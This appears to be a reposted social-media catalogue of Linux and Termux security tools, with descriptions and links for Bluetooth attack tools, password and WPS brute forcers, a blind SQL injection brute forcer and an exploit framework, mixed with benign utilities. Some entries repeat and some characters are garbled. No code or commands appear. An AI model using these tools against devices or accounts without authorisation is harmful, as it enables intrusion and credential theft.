capstone 3.0 A lightweight multi-platform, multi-architecture disassembly framework. http://www.capstone-engine.org/index.html
carwhisperer 0.2 Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. http://trifinite.org/trifinite_stuff_carwhisperer.html
casefile 1.0.1 The little brother to Maltego without transforms, but combines graph and link analysis to examine links between manually added data to mind map your information http://www.paterva.com/web6/products/casefile.php
cdpsnarf 0.1.6 Cisco discovery protocol sniffer. https://github.com/Zapotek/cdpsnarf
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest Part 3 :
pinterest.com/UndercOdeOfficial
bluepot 0.1 A Bluetooth Honeypot written in Java, it runs on Linux https://github.com/andrewmichaelsmith/bluepot/
blueprint 0.1_3 A perl tool to identify Bluetooth devices. http://trifinite.org/trifinite_stuff_blueprinting.html
blueranger 1.0 A simple Bash script which uses Link Quality to locate Bluetooth device radios. http://www.hackfromacave.com/projects/blueranger.html
bluesnarfer 0.1 A bluetooth attacking tool http://www.alighieri.org/project.html
bmap-tools 3.2 Tool for copying largely sparse files using information from a block map file. http://git.infradead.org/users/dedekind/bmap-tools.git
bob-the-butcher 0.7.1 A distributed password cracker package. http://btb.banquise.net/
bowcaster 0.1 This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. https://github.com/zcutlip/bowcaster
braa 0.82 A mass snmp scanner http://s-tech.elsat.net.pl/braa/
braces 0.4 A Bluetooth Tracking Utility. http://braces.shmoo.com/
bruteSniffing_Ficher A multiplatform python hacking tool for bruteforcing, cloning, fishing, information gathering and sniffing. https://github.com/programmingAthlete/BruteSniffing_Fisher
brutus 2 One of the fastest, most flexible remote password crackers you can get your hands on. http://www.hoobie.net/brutus/
bsdiff 4.3 bsdiff and bspatch are tools for building and applying patches to binary files. http://www.daemonology.net/bsdiff/
bsqlbf 2.7 Blind SQL Injection Brute Forcer. http://code.google.com/p/bsqlbf-v2/
bss 0.8 Bluetooth stack smasher / fuzzer http://www.secuobs.com/news/15022006-bss_0_8.shtml
bt_audit 0.1.1 Bluetooth audit http://www.betaversion.net/btdsd/download/
btcrack 1.1 The world's first Bluetooth Pass phrase (PIN) bruteforce tool. Bruteforces the Passkey and the Link key from captured Pairing exchanges. http://www.nruns.com/_en/security_tools_btcrack.php
btscanner 2.1 Bluetooth device scanner. http://www.pentest.co.uk
bulk-extractor 1.5.5 Bulk Email and URL extraction tool. https://github.com/simsong/bulk_extractor
bully 19.ba33677 A wifi-protected-setup (WPS) brute force attack tool. http://code.google.com/p/bully/
bunny 0.93 A closed loop, high-performance, general purpose protocol-blind fuzzer for C programs. http://code.google.com/p/bunny-the-fuzzer/
burpsuite 1.6 An integrated platform for attacking web applications (free edition). http://portswigger.net/burp/
buttinsky 138.1a2a1b2 Provide an open source framework for automated botnet monitoring. https://github.com/buttinsky/buttinsky
bvi 1.4.0beta A display-oriented editor for binary files operate like "vi" editor. http://bvi.sourceforge.net/
cadaver 0.23.3 Command-line WebDAV client for Unix http://www.webdav.org/cadaver
canari 1.1 A transform framework for maltego http://www.canariproject.com/
cansina 93.abc6577 A python-based Web Content Discovery Tool. https://github.com/deibit/cansina
capstone 3.0 A lightweight multi-platform, multi-architecture disassembly framework. http://www.capstone-engine.org/index.html
carwhisperer 0.2 Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. http://trifinite.org/trifinite_stuff_carwhisperer.html
casefile 1.0.1 The little brother to Maltego without transforms, but combines graph and link analysis to examine links between manually added data to mind map your information http://www.paterva.com/web6/products/casefile.php
cdpsnarf 0.1.6 Cisco discovery protocol sniffer. https://github.com/Zapotek/cdpsnarf
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β